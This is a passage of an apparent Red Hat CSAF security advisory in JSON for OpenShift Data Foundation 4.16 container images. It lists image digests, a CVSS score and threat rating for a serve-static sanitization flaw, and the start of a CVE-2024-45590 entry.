"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
